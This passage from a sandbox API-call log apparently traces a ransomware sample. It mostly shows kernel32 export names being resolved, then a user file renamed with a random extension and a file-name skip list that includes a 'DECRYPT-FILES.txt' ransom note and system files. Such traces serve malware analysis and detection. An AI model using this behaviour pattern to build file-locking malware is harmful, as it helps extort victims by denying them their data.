[0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.998] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.998] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.998] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.998] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.998] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.998] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.998] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.998] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.998] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.998] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.998] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.998] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.998] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.998] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.999] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.999] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.999] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.999] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.999] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.999] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.999] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.999] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.999] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.999] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.999] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.999] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.999] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.999] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.999] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.999] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.999] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.999] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.999] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.000] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.000] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.000] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.000] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.000] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.000] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.000] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.000] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.000] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.000] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.000] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.000] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.000] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.000] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.000] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.000] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.000] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.000] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.001] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.001] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.001] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.001] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.001] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.001] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.001] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.001] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.001] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.001] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.001] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.001] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.001] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.001] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.001] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.001] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.001] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.001] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.001] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.002] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.002] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.002] lstrlenA (lpString="DELETEATOM") returned 10 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.002] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.002] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.002] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.002] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.002] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.002] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.002] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.002] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.002] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.002] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.002] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.002] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.002] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.002] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.002] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.003] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.003] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.003] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.003] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.003] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.003] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.003] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.003] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.003] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.003] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.003] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.003] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.003] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.003] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.003] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.003] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.003] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.003] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.003] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.004] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.004] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.004] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.004] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.004] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.004] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.004] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.004] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b5XS GJUXmYXlZvRSW-.mp3") returned 69 [0077.004] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b5XS GJUXmYXlZvRSW-.mp3.XPfeB") returned 75 [0077.004] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b5XS GJUXmYXlZvRSW-.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b5xs gjuxmyxlzvrsw-.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b5XS GJUXmYXlZvRSW-.mp3.XPfeB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b5xs gjuxmyxlzvrsw-.mp3.xpfeb"), dwFlags=0x0) returned 1 [0077.005] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.005] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.005] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.006] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x716f2750, ftCreationTime.dwHighDateTime=0x1d4c8db, ftLastAccessTime.dwLowDateTime=0x57b1a230, ftLastAccessTime.dwHighDateTime=0x1d4c74f, ftLastWriteTime.dwLowDateTime=0x57b1a230, ftLastWriteTime.dwHighDateTime=0x1d4c74f, nFileSizeHigh=0x0, nFileSizeLow=0x342f, dwReserved0=0x0, dwReserved1=0x0, cFileName="CXtBKJuR4xY5m c.swf", cAlternateFileName="CXTBKJ~1.SWF")) returned 1 [0077.006] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf", lpString2="DECRYPT-FILES.txt") returned -1 [0077.006] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf", lpString2="autorun.inf") returned 1 [0077.006] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf", lpString2="boot.ini") returned 1 [0077.006] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf", lpString2="desktop.ini") returned -1 [0077.006] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf", lpString2="ntuser.dat") returned -1 [0077.006] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf", lpString2="iconcache.db") returned -1 